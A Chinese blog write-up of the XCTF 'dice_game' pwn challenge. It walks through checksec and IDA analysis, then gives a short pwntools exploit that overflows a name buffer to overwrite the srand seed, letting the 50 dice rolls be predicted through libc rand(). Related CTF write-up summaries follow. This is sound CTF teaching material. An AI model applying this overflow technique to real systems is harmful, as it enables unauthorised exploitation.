攻防世界 Pwn dice_game

最新推荐文章于 2025-05-01 19:24:47 发布
原创 最新推荐文章于 2025-05-01 19:24:47 发布 · 417 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn

本文介绍Pwndice_game挑战的解决方法,包括利用栈溢出覆盖随机数种子以预测骰子点数,最终获得flag的过程。涉及checksec检查、IDA分析及编写exp等步骤。

攻防世界 Pwn dice_game

1.题目下载地址

点击下载

2.checksec

在这里插入图片描述
没有canary,可能是简单的栈溢出

3.IDA分析

在这里插入图片描述
在sub_A20()中可以看出v2是一个通过种子生成的 1~6 的 随机数
之前有做过类似的题,只要控制种子即可预测随机数
在这里插入图片描述
在read函数处有栈溢出的漏洞
在这里插入图片描述

在下面看到需要连续答对50次才可以获取flag
那么我们构造的思路就是利用这个溢出点覆盖seed从而预测随机数

4.exp

from pwn import *
from ctypes import *
libc=cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
libc.srand(1)
sh=process('./a')
# sh=remote('124.126.19.106','30741')
payload='a'*0x40+p64(1)
sh.recvuntil('Welcome, let me know your name: ')
sh.sendline(payload)
for i in range(50):
    sh.recvuntil('Give me the point(1~6): ')
    sh.sendline(str(libc.rand()%6+1))

sh.recv()

在这里插入图片描述

攻防世界pwn——dice_game
qq_62076255的博客
12-19 628
攻防世界pwn——dice_game做题记录
dice_game攻防世界进阶区
shanwei274的博客
04-10 1973
dice_game XCTF 4th-QCTF-2018 前言,不得不说,虽然是个简单题但是还是要记录一下,来让自己记住这些东西。 考察的知识点是: 1.cdll_loadlibrary加载对应库使得Python可以使用c的函数。 2.关于srand函数中种子的介绍。 3.一些平时没有见过的杂项 保证我写的很详细,因为我也是个菜鸡 ----第一步查看保护喽 第一眼就很恐怖嗷,居然就只有canary没有开,其他的全开,got表也不能修改,我就很痛苦嗷 ----第二步ida看看 main函数这里要说的呢 1
攻防世界 dice_game
最新发布
2401_88087539的博客
05-01 376
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
攻防世界-pwn dice_game(栈内变量覆盖)
菜的只能随便写写博客
10-09 770
  0x01 检查文件  下载附件之后获得两个文件,一个可执行文件和一个libc,初步理解要使用libc。 64位elf 无栈保护 动态链接   0x02 程序分析  根据程序运行分析,程序应该是要求猜数字,连续答对50可获得flag。   0x03 IDA结构分析  从里面分析,可以看到程序的结构,while循环里面是猜数字的流程,一共50,并可以注意到18行设置了随机数的种子。...
攻防世界 PWN 高手进阶 dice_game (write up)
qq_44768749的博客
08-18 560
攻防世界 PWN 高手进阶 dice_gamedice_game0x01 查看保护机制0x02 反汇编main:sub_A20():sub_B28():0x03利用过程功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 dice_ga
攻防世界高手进阶区——dice_game
weixin_62675330的博客
02-19 2559
攻防世界高手进阶区——dice_game 题目里面啥都没有。 一.分析文件 checksec 只有栈溢出保护关闭了,其他都是开着的。 运行 可以看出是要猜数字,猜对50次。 ida逆向 __int64 __fastcall main(int a1, char **a2, char **a3) { char buf[55]; // [rsp+0h] [rbp-50h] BYREF char v5; // [rsp+37h] [rbp-19h] ssize_t v6; // [
攻防世界-dice_game-Writeup
SkYe's Blog
05-13 979
dice_game 题目来源: XCTF 4th-QCTF-2018 考点:栈溢出、混合编程 基本情况 程序实现的是一个具有用户姓名输入的菜随机数程序。 保护措施 Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled 栈溢出 一开始我在纠结是输入数字时使用的是短整型,可不可能是整型溢出,这样既能保持低位数字符合要求,又能控制
攻防世界-pwn-dice_game(srand(),rand(),随机数)
hanqdi_的博客
06-27 2344
高手进阶区 dice_game 考察知识点: srand(),rand()函数,产生随机数。 srand和rand()配合使用产生伪随机数序列。 rand函数在产生随机数前,要系统提供的生成伪随机数序列的种子,rand根据这个种子的值产生一系列随机数。 如果系统提供的种子没有变化,每次调用rand函数生成的伪随机数序列都是一样的。 比如:通常可以利用系统时间来改变系统的种子值,即srand(time(NULL)),可以为rand函数提供不同的种子值,进而产生不同的随机数序列。 如果srand(1),因为1
功防世界dice_game
weixin_34190136的博客
05-03 321
buf 长度最长为 0x50 但是当输入大于 49 的时候不会被截断,所以我们只要覆盖到之前的 seed 就可以为所欲为了。 同时注意到 seed 跟 buf 相差的偏移是 0x40,所以只要 68 个字符就可以溢出覆盖 seed 了。 Exploit 由于担心 python 的 randint 实现跟 libc 的不太一样,所以我写了个小程序 在vim编译运行.c文件步骤:...
[攻防世界 pwn]——dice_game
Y_peak的博客
02-20 415
[攻防世界 pwn]——dice_game 题目地址: https://adworld.xctf.org.cn/ 题目: 思路 该题和前面的guess_num差不多, 可以点击查看 请点击。这道题是, 利用输入的name将seed覆盖,使得后面产生的随机数不随机。 注意在Linux上面运行, window和Linux上面产生的随机数不一样 exploit from pwn import * from LibcSearcher import * p=remote("111.200.241.244",
Dice-Game:此代码模仿DICE的游戏
02-10
骰子游戏 此代码模仿DICE的游戏。 #此游戏模拟游戏幸运七人制。 玩家掷出2个骰子,如果数字加起来为7,则玩家赢得4美元,否则,他们输掉1美元。 该程序模拟了您要赚多少钱,并向您显示了拿了多少卷以及彩池的价值。 它还显示您是否赢钱或输钱。
dice_game:Jogo de dados,aoualizar apáginamostra o vencedor
03-08
骰子游戏 Sobre o projeto: Jogo de dados,或其他人。 Tecnologia ultilizada:Java语言 Demonstração: 结果会议结果: 拜拜 :rocket:
dice_game [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列12
重新启程
12-23 1990
题目地址:dice_game 从这篇开始就正式进入高手进阶区,一些简单的知识点我这里就不会再重复赘述了,请有要的同学看前面的章节。 废话不多,看看题目 题目没什么提示,只是知道这个题目的来源是:XCTF 4th-QCTF-2018 下载附件,看看情况,照例做下保护机制检查 root@mypwn:/ctf/work/python/dice_game# checksec dice_g...
攻防世界(Pwn)dice_game, 栈溢出覆盖srand种子
半岛铁盒的博客
03-05 1537
说明 这其实是一种类型题,新手刚开始会碰到,题目大致过程是 有个srand()的随机函数.要覆盖 seed种子 即srand(seed) 把 seed 覆盖为一个固定的数 , srand 就是伪随机函数了, 题目会有个猜数循 环,比如猜对了20次flag就有了,和这道题类似的题目还有新手区的guess_num 解题 点进去read中的 buf; EXp from pwn import * from ctypes import * p=remote('111.200.241.244','38
攻防世界dice_game(pwn)
CTF小白的博客
05-08 4890
dice_game 题目考察:rand()生成的随机数和随机种子seed()有关,通过观察题目,可以发现存在溢出漏洞,通过输入可以覆盖到seed(),实现一个可预测的随机数列。 题目分析 这边就可以看到,buf覆盖0x40位就能覆盖到seed。 sub_A20()如下,就是比较你输入的数是否和产生的随机数相等。 当回答正确50次时,会执行sub_B28这个函数,读取flag。 所以我们要做...
攻防世界 dice_game栈溢出+随机数
fanghuapyk的博客
03-19 289
攻防世界 dice_game栈溢出+随机数 检查保护 发现是64位程序,并且开启了NX保护和地址随机化 上ida 发现flag敏感字符,追踪发现sub_B28函数里面可以直接得到flag 这里解释一下 Fopen函数: FILE *fopen(char *filename, char *mode); filename为文件名(包括文件路径),mode为打开方式,它们都是字符串。 Fget函数: 函数原型 char *fgets(char *str, int n, FILE *stream); 参数:
xctf 攻防世界-dicegame writeup
qq_43189757的博客
07-07 476
比较容易发现可以对buf进行缓冲区溢出,继续往下看 可以发现获得flag的条件是循环50次,50次输入的v1值与随机数v2 都相等 根据前面发现的缓冲区溢出可以发现我们可以覆盖掉seed种子值 那么种子值可以被我们随意设置为一个任意值,我把它设置为0,有了种子值可以写一个c程序把50次产生的随机数都求出来 有了随机数便可以编写exp了 C程序: #include <stdio.h&...
攻防世界——pwn(3)
weixin_44319142的博客
04-11 957
guess_num seed和rand的知识点就是一个伪生成随机数的东西要用ctypes倒入这个库才能用rand 理一下思路,利用v7覆盖seed[0],使seed[0]已知,然后循环,然后直接拿flag就好了 exp from pwn import * from ctypes import * #倒入了可以去找libc库 context.log_level = 'debug' p =...
BUUCTF pwn qctf_2018_dice_game
热门推荐
stareforever的博客
12-25 3万+
查看保护 程序流程 输入name后 连续猜对50次随机数即可获得flag 输入buf的可以覆盖栈上的内容,那么输入0x50个字符就可以覆盖seed,最终产生的随机数就是定值了 考虑输入0x50个‘A’,那么写c程序 可以获得生成的随机数列表 3, 3, 2, 1, 5, 3, 4, 6, 3, 4, 2, 2, 3, 2, 1, 1, 4, 5, 4, 6, 3, 6, 4, 3, 4, 2, 2, 6, 1, 2, 2, 3, 4, 1, 2, 1, 4, 5, 4, 6, 6, 5, 1, 3,
攻防世界pwn题目int_overflow
03-08
### 关于CTF PWN Int Overflow Challenge Solution 在处理PWN类型的整数溢出挑战时,理解程序如何处理输入以及这些输入怎样影响内存至关重要。当遇到名为`int_overflow`的题目时,这可能意味着某个`int`型变量存在...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

==Microsoft==

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值